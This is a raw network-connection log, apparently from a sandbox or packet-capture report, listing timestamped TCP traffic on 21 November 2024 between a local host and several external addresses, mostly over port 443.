                                                                                                                                                                              Nov 21, 2024 08:31:38.213944912 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.213990927 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.214059114 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.214195967 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.214205027 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.595985889 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.599396944 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.599474907 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.599524975 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.599536896 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.599546909 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.599551916 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.602969885 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.602988005 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.603199959 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.603249073 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.603254080 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.913166046 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.913723946 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.913789988 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:38.914175987 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:38.914191008 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.257894993 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:39.258017063 CET4434997340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.258119106 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:39.258677959 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:39.258714914 CET4434997340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.478022099 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.480994940 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.481110096 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.481210947 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.481210947 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.492614031 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.492664099 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.492697954 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.492714882 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.526879072 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.526901960 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.527012110 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.527180910 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.527190924 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.782800913 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.783540964 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.783571959 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.783962965 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.783968925 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.809189081 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.810513973 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.810580015 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.811125994 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.811150074 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.995769978 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.996239901 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.996267080 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:39.997796059 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:39.997807980 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.227188110 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.230313063 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.230364084 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.230407000 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.230426073 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.230438948 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.230444908 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.233927965 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.233953953 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.234014988 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.234191895 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.234199047 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.243293047 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.246455908 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.246521950 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.246524096 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.246575117 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.246639967 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.246659040 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.246686935 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.246694088 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.249258041 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.249310017 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.249382019 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.249521017 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.249540091 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.439141989 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.442250967 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.443412066 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.452487946 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.452519894 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.452538967 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.452545881 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.461355925 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.461399078 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.461487055 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.462675095 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.462688923 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.475310087 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.476712942 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.476730108 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.477165937 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.477170944 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.927512884 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.927529097 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.927598000 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.927612066 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.927881956 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.927892923 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.927958012 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.928062916 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.928097010 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.928271055 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.932389975 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.932429075 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:40.932670116 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.932802916 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:40.932811975 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.134541988 CET4434997340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.134644032 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:41.137252092 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:41.137268066 CET4434997340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.138037920 CET4434997340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.139556885 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:41.139750957 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:41.139759064 CET4434997340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.139894962 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:41.187335968 CET4434997340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.309952974 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.310539007 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.310549021 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.311105967 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.311110973 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.548641920 CET4434997340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.548850060 CET4434997340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.549077988 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:41.549284935 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:41.549314976 CET4434997340.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.549329042 CET49973443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:31:41.753884077 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.753957987 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.754072905 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.754089117 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.754571915 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.754571915 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.754586935 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.754918098 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.754990101 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.757114887 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.757142067 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.757220030 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.757330894 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.757540941 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.757574081 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.895580053 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.896178007 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.896203041 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:41.896764994 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:41.896770000 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.002490997 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.037357092 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.037381887 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.037847042 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.037853956 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.307132006 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.307750940 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.307810068 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.308233976 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.308248043 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.347791910 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.350828886 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.350888968 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.350940943 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.350967884 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.350981951 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.350991011 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.355609894 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.355659962 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.355720043 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.356014967 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.356034040 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.437261105 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.440331936 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.440375090 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.440390110 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.440406084 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.440459013 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.440531969 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.440531969 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.440546036 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.440556049 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.443192959 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.443238020 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.443310022 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.443447113 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.443464041 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.547060013 CET4970580192.168.2.6199.232.210.172
                                                                                                                                                                              Nov 21, 2024 08:31:42.547218084 CET49703443192.168.2.640.126.31.73
                                                                                                                                                                              Nov 21, 2024 08:31:42.667625904 CET8049705199.232.210.172192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.667659998 CET4434970340.126.31.73192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.667704105 CET4970580192.168.2.6199.232.210.172
                                                                                                                                                                              Nov 21, 2024 08:31:42.667732954 CET49703443192.168.2.640.126.31.73
                                                                                                                                                                              Nov 21, 2024 08:31:42.760684967 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.760893106 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.760946989 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.761023045 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.761023998 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.761126995 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.761126995 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.761173964 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.761203051 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.764638901 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.764692068 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.764759064 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.764934063 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.764954090 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.802638054 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.803189039 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.803224087 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:42.803654909 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:42.803664923 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:43.254971981 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:43.258369923 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:43.258482933 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:43.258510113 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:43.258527040 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:43.258537054 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:43.258542061 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:43.261240959 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:43.261342049 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:43.261436939 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:43.261590958 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:43.261622906 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:43.611305952 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:43.611907959 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:43.611939907 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:43.612360001 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:43.612384081 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.067940950 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.070791960 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.070847988 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.070909977 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.070913076 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.071269989 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.071293116 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.071295023 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.071758032 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.071764946 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.071815014 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.071841955 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.071856976 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.071863890 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.074614048 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.074709892 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.074850082 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.075045109 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.075083971 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.230058908 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.230638027 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.230691910 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.231141090 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.231154919 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.506093025 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.506279945 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.506447077 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.506484985 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.506501913 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.506515980 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.506524086 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.509181023 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.509205103 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.509278059 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.509427071 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.509435892 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.611511946 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.614908934 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.614937067 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.663918018 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.663929939 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.672097921 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.675415993 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.675481081 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.675534964 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.675575972 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.675625086 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.678057909 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.678113937 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.678143978 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.678159952 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.888542891 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.888638973 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:44.888698101 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.888984919 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:44.889015913 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:45.041995049 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:45.042481899 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:45.042529106 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:45.043005943 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:45.043018103 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:45.067460060 CET4434998213.107.246.45192.168.2.6
